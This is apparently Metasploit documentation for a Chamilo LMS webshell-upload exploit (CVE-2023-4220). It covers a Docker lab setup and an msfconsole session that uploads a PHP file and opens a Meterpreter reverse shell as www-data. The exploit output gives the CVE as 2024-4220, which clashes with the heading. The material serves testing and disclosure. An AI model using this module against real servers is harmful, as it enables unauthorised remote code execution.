Jack Heysel
3.7 KiB
Vulnerable Application
Chamilo LMS is a free software e-learning and content management system. In versions prior to <= v1.11.24
a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter action is set to
post-unsupported file extension checks are skipped allowing for attacker controlled .php files to be uploaded to:
/main/inc/lib/javascript/bigupload/files/ if the /files/ directory already exists - it does not exist
by default.
Setup
A vulnerable docker-compose configuration can be found at the following link: https://github.com/vulhub/vulhub/pull/559
Clone the repo vulhub: https://github.com/vulhub/vulhub.git checkout the pull request mentioned above.
Once cloned run cd vulhub/chamilo/CVE-2023-4220. Then run docker compose up
After the contain is build navigate to http://127.0.0.1:8080 to complete the installation wizard.
Note when filling out the database IP address and credentials - the DB hostname is the name of the container which is
mariadb (not localhost or 127.0.0.1). Once the installation wizard is complete the target should be ready to be
exploited with the module. This container has the non-default /files/ directory created already.
Verification Steps
- Start msfconsole
- Do:
use - Set the
RHOST,RPORT, andLHSOToptions - Run the module
- Receive a Meterpreter session as the
www-datauser.
Scenarios
Chamilo 1.11.18 running in Docker
msf6 > use linux/http/chamilo_bigupload_webshell
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rport 8080
rport => 8080
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/chamilo_bigupload_webshell) > show options
Module options (exploit/linux/http/chamilo_bigupload_webshell):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/chamilo_bigupload_webshell) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.
[+] The target is vulnerable. File upload was successful (CVE-2024-4220 was exploited successfully).
[*] Sending stage (40004 bytes) to 172.16.199.1
[+] Deleted 1nZaWHvP
[+] Deleted kFAqQcbWxs.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:60031) at 2024-11-11 10:42:06 -0800
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : c2064983b0e1
OS : Linux c2064983b0e1 6.10.11-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Oct 3 10:19:48 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >